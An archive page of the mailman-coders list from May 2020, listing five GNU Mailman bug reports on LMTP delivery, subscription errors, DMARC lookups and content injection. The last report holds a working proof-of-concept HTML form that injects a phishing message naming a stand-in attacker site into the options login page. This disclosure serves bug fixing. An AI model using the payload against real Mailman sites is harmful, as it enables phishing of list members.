Mailman-coders May 2020

mailman-coders@python.org

6 participants
5 discussions

[Bug 544477] [NEW] setting localhost in postfix_lmtp breaks delivery

by Patrick Ben Koetter

Public bug reported: Setting localhost in postfix_lmtp works against Postfix defaults and breaks delivery. Reason: The Postfix lmtp client only uses dns queries by default to search for hostnames. If the DNS server does not provide an answer for "localhost" delivery from the lmtp client to mailman fails. Solution: Provide "127.0.0.1" instead of "localhost". This does not require DNS and is even faster because it saves DNS lookups. Example: hey2(a)mailman.state-of-mind.de lmtp:[localhost.localdomain]:8024 ** Affects: mailman Importance: Undecided Status: New ** Tags: 3.0 mailman -- setting localhost in postfix_lmtp breaks delivery https://bugs.launchpad.net/bugs/544477 You received this bug notification because you are a member of Mailman Coders, which is subscribed to GNU Mailman.

5 months

[Bug 1878458] [NEW] Attempting to subscribe to a list can throw a ValueError exception.

by Mark Sapiro

Public bug reported: The fix for https://bugs.launchpad.net/mailman/+bug/1859104 assumes that every entry in pending.pck is a 2-tuple, but this is wrong. The attached patch will fix this. ** Affects: mailman Importance: Medium Assignee: Mark Sapiro (msapiro) Status: In Progress ** Patch added: "Patch to fix this issue" https://bugs.launchpad.net/bugs/1878458/+attachment/5371019/+files/MailList… -- You received this bug notification because you are a member of Mailman Coders, which is subscribed to GNU Mailman. https://bugs.launchpad.net/bugs/1878458 Title: Attempting to subscribe to a list can throw a ValueError exception. To manage notifications about this bug go to: https://bugs.launchpad.net/mailman/+bug/1878458/+subscriptions

8 months

[Bug 1881035] [NEW] DMARC mitigation fails if TXT record name contains uppercase

by Robert Mathews

Public bug reported: Using Mailman 2.1.33. I noticed that occasionally, DMARC mitigations for aol.com "From" addresses were not being applied. I tracked us down to the fact that DNS records can in rare cases return "AOL" in uppercase in the answer of the TXT record lookup. Here's an example where I caught it happening: $ dig _dmarc.aol.com TXT [...] ;; QUESTION SECTION: ;_dmarc.aol.com. IN TXT ;; ANSWER SECTION: _dmarc.AOL.com. 492 IN TXT "v=DMARC1; p=reject; pct=100; rua=mailto:d@rua.agari.com; ruf=mailto:d@ruf.agari.com;" Note that we requested "_dmarc.aol.com" in the question section, but got back "_dmarc.AOL.com" in the answer section. That case mismatch makes this code in Mailman/Utils.py skip the record: for name in want_names: if name not in results_by_name: continue I believe the solution is to lowercase the result after the lookup. Patch attached. ** Affects: mailman Importance: Undecided Status: New ** Tags: dmarc ** Patch added: "Lowercase DMARC TXT record label in answer section" https://bugs.launchpad.net/bugs/1881035/+attachment/5377571/+files/mailman-… -- You received this bug notification because you are a member of Mailman Coders, which is subscribed to GNU Mailman. https://bugs.launchpad.net/bugs/1881035 Title: DMARC mitigation fails if TXT record name contains uppercase To manage notifications about this bug go to: https://bugs.launchpad.net/mailman/+bug/1881035/+subscriptions

8 months

[Bug 1877379] [NEW] Arbitrary Content Injection via the private archive login page.

by Mark Sapiro

Public bug reported: This is essentially the same as https://bugs.launchpad.net/mailman/+bug/1873722 except the vector is the private archive login page and the attack only succeeds if the list's roster visibility (private_roster) setting is 'Anyone'. This is fixed by the attached patch. ** Affects: mailman Importance: Low Assignee: Mark Sapiro (msapiro) Status: In Progress ** Patch added: "Patch to fix this issue" https://bugs.launchpad.net/bugs/1877379/+attachment/5367829/+files/private.… -- You received this bug notification because you are a member of Mailman Coders, which is subscribed to GNU Mailman. https://bugs.launchpad.net/bugs/1877379 Title: Arbitrary Content Injection via the private archive login page. To manage notifications about this bug go to: https://bugs.launchpad.net/mailman/+bug/1877379/+subscriptions

8 months

[Bug 1873722] [NEW] Arbitrary Content Injection via the options login page.

by Mark Sapiro

*** This bug is a security vulnerability *** Private security bug reported: An issue similar to CVE - https://www.cvedetails.com/cve/CVE-2018-13796/ exists at different endpoint & param. It can lead to a phishing attack. Steps To Reproduce: 1. Copy and save the following HTML code and open it in any browser. Code: <html> <body> <script>history.pushState('', '', '/')</script> <form action="https://example.com/mailman/options/mailman" method="POST"> <input type="hidden" name="email" value="Your account has been hacked. Kindly go to https://badsite.com or share your credentials at attacker@badsite.com" /> <input type="hidden" name="UserOptions" value="Unsubscribe or edit options" /> <input type="hidden" name="language" value="en" /> <input type="submit" value="Submit request" /> </form> </body> </html> 2. Can be seen there- "Your account has been hacked. Kindly go to https://badsite.com or share your credentials at attacker(a)badsite.com" message will be displayed on the screen. ** Affects: mailman Importance: Medium Assignee: Mark Sapiro (msapiro) Status: Confirmed -- You received this bug notification because you are a member of Mailman Coders, which is subscribed to GNU Mailman. https://bugs.launchpad.net/bugs/1873722 Title: Arbitrary Content Injection via the options login page. To manage notifications about this bug go to: https://bugs.launchpad.net/mailman/+bug/1873722/+subscriptions

8 months, 1 week

2021

2020

2019

2018

2017

2016

2015

2014

2013

2012

2011

2010

2009

2008

2007

2006

2005

2004

2003

Mailman-coders May 2020